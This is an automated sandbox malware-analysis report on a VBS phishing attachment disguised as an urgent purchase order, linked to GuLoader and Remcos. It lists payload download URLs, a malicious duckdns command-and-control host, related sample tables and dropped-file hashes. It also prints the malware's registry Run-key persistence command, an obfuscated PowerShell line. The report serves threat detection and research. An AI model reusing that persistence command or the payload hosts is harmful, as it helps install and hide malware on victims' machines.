                        https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv88BF.tmp.16.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.Ppowershell.exe, 00000002.00000002.2605528910.000001DB97B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.office.com/bhv88BF.tmp.16.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2668709649.000001DBA5DCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://go.micpowershell.exe, 00000002.00000002.2604146948.000001DB95BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.imvu.compDatawab.exe, 00000012.00000002.2584615593.000000000329D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://microsoft.copowershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://go.micropowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.imvu.comwab.exe, wab.exe, 00000012.00000002.2584615593.000000000329D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aefd.nelreports.net/api/report?cat=wsbbhv88BF.tmp.16.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv88BF.tmp.16.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/Pustpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/Nepowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://contemega.com.dopowershell.exe, 00000002.00000002.2605528910.000001DB97B20000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gp.pwab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/Pustene.lpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/Pustenpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/Pustenepowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aefd.nelreports.net/api/report?cat=bingaotbhv88BF.tmp.16.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/Nepowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gpalwab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aefd.nelreports.net/api/report?cat=bingrmsbhv88BF.tmp.16.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/accounts/serviceloginwab.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2605528910.000001DB95D61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contemega.com.do/New/New/mVbkq170.binNwab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.compowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.microspowershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ebuddy.comwab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        178.237.33.50
                        geoplugin.netNetherlands
                        8455ATOM86-ASATOM86NLfalse
                        192.185.112.252
                        contemega.com.doUnited States
                        46606UNIFIEDLAYER-AS-1USfalse
                        206.123.148.194
                        janbours92harbu02.duckdns.orgUnited States
                        9009M247GBtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1465344
                        Start date and time:2024-07-01 15:36:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 16s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winVBS@25/11@3/3
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 155
                        • Number of non-executed functions: 306
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 1908 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 3892 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
                        TimeTypeDescription
                        09:37:04API Interceptor134x Sleep call for process: powershell.exe modified
                        09:38:15API Interceptor907387x Sleep call for process: wab.exe modified
                        15:37:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Likvidationsprovenuet %Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)
                        15:37:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Likvidationsprovenuet %Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        178.237.33.50Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        192.185.112.252DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
                          206.123.148.194Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                            DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              Deutschepost Invoice & Awb0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                  MaerskPreawbsamedaydelivery636489384759390200.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    janbours92harbu02.duckdns.orgMaersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    Deutschepost Invoice & Awb0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    Transaction_Execution_Confirmation_000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.196
                                    DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    MaerskPreawbsamedaydelivery636489384759390200.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    DHL_Shipping_Invoice_Awb_0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 194.55.186.124
                                    contemega.com.doDHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
                                    • 192.185.112.252
                                    geoplugin.netOffer ZI-0428.docGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    Quotation.xlsGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    UNIFIEDLAYER-AS-1USMV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                    • 50.87.144.157
                                    h8N9qpyRAPaiitu.exeGet hashmaliciousFormBookBrowse
                                    • 50.87.148.119
                                    Att0027592.exeGet hashmaliciousFormBookBrowse
                                    • 162.240.81.18
                                    awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 192.185.217.247
                                    DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
                                    • 192.185.112.252
                                    invoice__ pdf.wsfGet hashmaliciousGuLoaderBrowse
                                    • 192.185.76.254
                                    Price 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.167.140.123
                                    dvrLocker.elfGet hashmaliciousUnknownBrowse
                                    • 192.163.243.132
                                    https://sites.google.com/view/zinkfoodservicegroupinc/homeGet hashmaliciousHTMLPhisherBrowse
                                    • 192.254.234.46
                                    https://z1jERelgfj.inthezoneinc.com/Facebook.com/5MTE0XyUvddHaCu5rQ21ZpgdMMqDVaFyCyeBzYy3YKiKgHKLLWq8pXY9KiAVYP2BTqwZ9gFjZfUghzQcC9kyB1gfJmu2ebUNmRjGCzJ4RwcxVJWJH9pv78uuEjWKhL0iAz9Mdy7JQaLNFi8EE9y6Na3FjPUp0f1WwxQrJSD9xGypM2nuJy2GKkVGCcLwESgp7y7in7tvLSFZgMKGpr3cN35mAJQhiWpNZngRx-Y3Job2Fkc0B0YmMudXM=&d=DwMGaQGet hashmaliciousUnknownBrowse
                                    • 192.185.84.88
                                    ATOM86-ASATOM86NLOffer ZI-0428.docGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    Quotation.xlsGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    M247GBinvoice-72717953897646054572255005658360083176291774189023-quiltercheviot.pdfGet hashmaliciousHTMLPhisherBrowse
                                    • 38.132.122.254
                                    Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 173.211.86.129
                                    DCwYFBy6z7.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 38.204.196.215
                                    DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    Deutschepost Invoice & Awb0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.194
                                    8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                    • 38.207.19.49
                                    https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA0MzgwJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                    • 195.133.83.209
                                    https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                    • 195.133.83.209
                                    Transaction_Execution_Confirmation_000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 206.123.148.196
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0ePh58Rkdxor.exeGet hashmaliciousXWormBrowse
                                    • 192.185.112.252
                                    4kvADqDmZ4.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 192.185.112.252
                                    doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                                    • 192.185.112.252
                                    Drawing specification and June PO #07329.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                    • 192.185.112.252
                                    Setup.exeGet hashmaliciousUnknownBrowse
                                    • 192.185.112.252
                                    IMG_067_6331002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 192.185.112.252
                                    MV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                    • 192.185.112.252
                                    new shippment.exeGet hashmaliciousAgentTeslaBrowse
                                    • 192.185.112.252
                                    payment order.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 192.185.112.252
                                    S#U0130PAR#U0130#U015e-260624.exeGet hashmaliciousUnknownBrowse
                                    • 192.185.112.252
                                    37f463bf4616ecd445d4a1937da06e19doc20240625-00073.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 192.185.112.252
                                    SeAH RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                    • 192.185.112.252
                                    20240506_120821.xlsGet hashmaliciousUnknownBrowse
                                    • 192.185.112.252
                                    New Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 192.185.112.252
                                    awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 192.185.112.252
                                    zyJWi2vy29.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                                    • 192.185.112.252
                                    56bDgH9sMQ.exeGet hashmaliciousVidarBrowse
                                    • 192.185.112.252
                                    vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                    • 192.185.112.252
                                    factura546532.msi_factura546532.msi_78870.msiGet hashmaliciousUnknownBrowse
                                    • 192.185.112.252
                                    FIX_0x80070643_(Need_reboot).regGet hashmaliciousUnknownBrowse
                                    • 192.185.112.252
                                    No context
                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):962
                                    Entropy (8bit):5.013130376969173
                                    Encrypted:false
                                    SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                    MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                    SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                    SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                    SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                    Malicious:false
                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):11608
                                    Entropy (8bit):4.8908305915084105
                                    Encrypted:false
                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                    MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                    SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                    SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                    SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                    Malicious:false
                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllultnxj:NllU
                                    MD5:F93358E626551B46E6ED5A0A9D29BD51
                                    SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                    SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                    SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                    Malicious:false
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0xf147139f, page size 32768, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):17301504
                                    Entropy (8bit):1.0257401238360166
                                    Encrypted:false
                                    SSDEEP:6144:LvQPP7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkoB:jyUt3F0TkT0TAitKxK9JdIC4AgC
                                    MD5:42EBD118D283DD86A154B6FBA1E512A5
                                    SHA1:E7EDF80C1C435252B5272DE292A6ABEBB5AB2602
                                    SHA-256:DF2CB35D705406DCD6DB36267A36A725A7E2EFC715D1F28EC254B018C364C930
                                    SHA-512:743E32807E04AB2872FC65BBF2252C63930FE6C86A00283CF9B8CBA1802008D7BDE7199EA6AB8A18A3397387392BF4E4DE2FB937E5A92D0C524B285394DB784C
                                    Malicious:false
                                    Preview:.G..... .......4.........gN;....{........................&....../...{...%...|A.h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{...................................0-&.%...|A..................z...%...|A..........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
